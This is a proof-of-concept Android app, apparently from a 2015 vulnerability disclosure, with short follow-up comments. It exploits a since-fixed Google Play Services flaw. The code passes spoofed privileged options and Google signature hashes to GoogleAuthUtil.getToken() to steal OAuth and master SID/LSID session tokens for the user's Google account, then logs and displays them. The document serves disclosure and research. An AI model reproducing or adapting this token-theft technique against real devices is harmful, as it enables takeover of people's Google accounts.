PoC for Android GoogleAuthUtil.getToken() bug

MainActivity.java

package com.isciurus.oauth_poc;

import java.io.IOException;
import java.text.DateFormat;
import java.util.Date;
import com.google.android.gms.auth.GoogleAuthException;
import com.google.android.gms.auth.GoogleAuthUtil;
import com.google.android.gms.auth.UserRecoverableAuthException;
import android.accounts.AccountManager;
import android.app.Activity;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;

public class MainActivity extends Activity {
  public static String _log_str = null;
  public static OAuthPoCtask task;
  public String accountName = "";

  @Override
  protected void onActivityResult(int requestCode, int resultCode, Intent data) {
    if (resultCode == RESULT_OK) {
      accountName = data.getStringExtra(AccountManager.KEY_ACCOUNT_NAME);
      Log.d("isciurus", "got primary account: " + accountName);
      task = new OAuthPoCtask();
      task.execute(this);
    }
  }
	
  private class LeakEmail extends AsyncTask<MainActivity, String, String> {
    @Override
    protected String doInBackground(MainActivity... mContext) {	
      Log.d("isciurus", "getting primary account");
      Intent aci = AccountManager.newChooseAccountIntent(null, null,
      new String[]{"com.google"}, false, null, null, null, null);
      startActivityForResult(aci, 0);
      return null;
    }
  }
	
  private class OAuthPoCtask extends AsyncTask<MainActivity, String, String> {
    protected String doInBackground(MainActivity... mContext) {
      String service = "SID";
      String service2 = "LSID";
      
      Bundle bdl = new Bundle();
      bdl.putString("_opt_has_permission", "1");
      bdl.putString("_opt_add_account", "1");
      bdl.putString("_opt_system_partition", "1");
      bdl.putString("_opt_client_sig", "58e1c4133f7441ec3d2c270270a14802da47ba0e");
      bdl.putString("_opt_app", "com.google.android.gms");
      String token0 = "", token01 = "", token1 = "", token2 = "";
      
      try {
        Log.d("isciurus", "[test 1]");
        token0 = GoogleAuthUtil.getToken(mContext[0], accountName, 
            "oauth2:https://www.googleapis.com/auth/plus.login", bdl);
      } catch (UserRecoverableAuthException e) {
        Log.d("isciurus", "getting token failed, replacing the signature");
        bdl.remove("_opt_client_sig");
        bdl.putString("_opt_client_sig", "38918a453d07199354f8b19af05ec6562ced5788");
        try {
          token0 = GoogleAuthUtil.getToken(mContext[0], accountName,
              "oauth2:https://www.googleapis.com/auth/plus.login", bdl);
        } catch (UserRecoverableAuthException e1) {
           e1.printStackTrace();
        } catch (IOException e1) {
          e1.printStackTrace();
        } catch (GoogleAuthException e1) {
          e1.printStackTrace();
        }
      } catch (GoogleAuthException e) {
        e.printStackTrace();
      }
      catch (IOException e) {
        e.printStackTrace();
      }
      
      if(token0 == "")
        Log.d("isciurus", "[test 1] failed");
      else
        Log.d("isciurus", "[test 1] ok");
      
      try {
        Log.d("isciurus", "[test 2]");
        token1 = GoogleAuthUtil.getToken(mContext[0], accountName, service, bdl);	
      } catch (UserRecoverableAuthException e) {
        e.printStackTrace();
      } catch (GoogleAuthException e) {
        e.printStackTrace();
      } catch (IOException e) {
        e.printStackTrace();
      }
      
      try {
        token2 = GoogleAuthUtil.getToken(mContext[0], accountName, service2, bdl);
      } catch (UserRecoverableAuthException e) {
        e.printStackTrace();
      } catch (GoogleAuthException e) {
        e.printStackTrace();
      }
      catch (IOException e) {
        e.printStackTrace();
      }
      
      if(token1 == "" || token2 == "")
        Log.d("isciurus", "[test 2] fail");
      else
        Log.d("isciurus", "[test 2] ok");
      
      _log_str = "token0=" + token0 + "\r\ntoken01=" + token01 + "\r\n" +
        "SID=" + token1 + "\r\nLSID=" + token2;
      Log.d("isciurus", _log_str);
      
      runOnUiThread(new Runnable() {
         @Override
         public void run() {
           TextView t=(TextView) findViewById(R.id.text1); 
           t.setText(MainActivity._log_str);
        }
      });
      
      return "";
    }
  }
	
  @SuppressWarnings("deprecation")
  @Override
  protected void onCreate(Bundle savedInstanceState) {  	
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    TextView t=(TextView) findViewById(R.id.text1);
    t.setText("loading");
    String currentDateTimeString = DateFormat.getDateTimeInstance().format(new Date());
    Log.d("isciurus", currentDateTimeString); 
    LeakEmail leak_fn = new LeakEmail();
    leak_fn.execute(this);
  }
}

http://isciurus.blogspot.com/2015/01/android-app-with-full-control-over-your.html

2 myanimal:
You can try reproducing on older (before December 2, 2014) versions of Google Play before I reported it. I don't know how to downgrade, but I have an apk from that time.

Thanks @isciurus, I can confirm this is reproducible on Play Services 6.1.11 (~ 3 October 2104). Looks like it's fixed in both the 6.1 and 6.5 branches. Good job and thanks for reporting it!